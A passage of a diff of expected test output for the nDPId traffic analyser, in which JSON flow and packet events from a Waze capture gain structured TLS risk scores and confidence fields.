-00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878215,"flow_last_seen":1435587878444,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587878444,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878215,"flow_last_seen":1435587878444,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587878444,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587878606,"flow_last_seen":1435587878606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1435587878606,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1435587878606,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1435587878606,"pkt":"ABoRAAACABoRAAABCABFAAA8DkFAAEAGt5sKCAABsCK6tI3YAbvsnGGoAAAAAKAC\/\/+FVQAAAgQFtAQCCAoACG\/pAAAAAAEDAwg="}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1435587878608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587878608,"pkt":"ABoRAAACABoRAAABCABFAAAodR5AABAGgNKwIrq0CggAAQG7jdgTY55X7JxhqVAS\/\/+rXgAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1435587878609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587878609,"pkt":"ABoRAAACABoRAAABCABFAAAoDkJAAEAGt64KCAABsCK6tI3YAbvsnGGpE2OeWFAQ\/\/+rXwAA"}
-00887{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878215,"flow_last_seen":1435587878781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1435587878781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}}
-01141{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878215,"flow_last_seen":1435587878832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2123,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"ts_msec":1435587878832,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878606,"flow_last_seen":1435587878901,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587878901,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878215,"flow_last_seen":1435587878781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1435587878781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}}
+01246{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878215,"flow_last_seen":1435587878832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2123,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"ts_msec":1435587878832,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878606,"flow_last_seen":1435587878901,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587878901,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587879018,"flow_last_seen":1435587879018,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1435587879018,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1435587879018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1435587879018,"pkt":"ABoRAAACABoRAAABCABFAAA8CjxAAEAGu6AKCAABsCK6tI3aAbtwD3ouAAAAAKAC\/\/\/pMQAAAgQFtAQCCAoACHASAAAAAAEDAwg="}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1435587879020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587879020,"pkt":"ABoRAAACABoRAAABCABFAAAodSNAABAGgM2wIrq0CggAAQG7jdqP8IXRcA96L1AS\/\/+rXAAA"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1435587879020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587879020,"pkt":"ABoRAAACABoRAAABCABFAAAoCj1AAEAGu7MKCAABsCK6tI3aAbtwD3ovj\/CF0lAQ\/\/+rXQAA"}
-00888{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878606,"flow_last_seen":1435587879181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"ts_msec":1435587879181,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}}
-01142{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878606,"flow_last_seen":1435587879233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"ts_msec":1435587879233,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879018,"flow_last_seen":1435587879574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587879574,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878606,"flow_last_seen":1435587879181,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"ts_msec":1435587879181,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}}
+01247{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878606,"flow_last_seen":1435587879233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"ts_msec":1435587879233,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879018,"flow_last_seen":1435587879574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587879574,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587879850,"flow_last_seen":1435587879850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1435587879850,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1435587879850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1435587879850,"pkt":"ABoRAAACABoRAAABCABFAAA8Fw9AAEAGrs0KCAABsCK6tI3cAbueIGdrAAAAAKAC\/\/\/NjwAAAgQFtAQCCAoACHBkAAAAAAEDAwg="}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1435587879852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587879852,"pkt":"ABoRAAACABoRAAABCABFAAAodS5AABAGgMKwIrq0CggAAQG7jdxh35iUniBnbFAS\/\/+rWgAA"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1435587879853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1435587879853,"pkt":"ABoRAAACABoRAAABCABFAAAoFxBAAEAGruAKCAABsCK6tI3cAbueIGdsYd+YlVAQ\/\/+rWwAA"}
-00888{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":396,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879018,"flow_last_seen":1435587879855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"ts_msec":1435587879855,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}}
-01142{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587879018,"flow_last_seen":1435587879907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"ts_msec":1435587879907,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879850,"flow_last_seen":1435587879958,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1435587879958,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01142{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":428,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879850,"flow_last_seen":1435587880568,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"ts_msec":1435587880568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
+00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":396,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879018,"flow_last_seen":1435587879855,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"ts_msec":1435587879855,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}}
+01247{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587879018,"flow_last_seen":1435587879907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"ts_msec":1435587879907,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}}
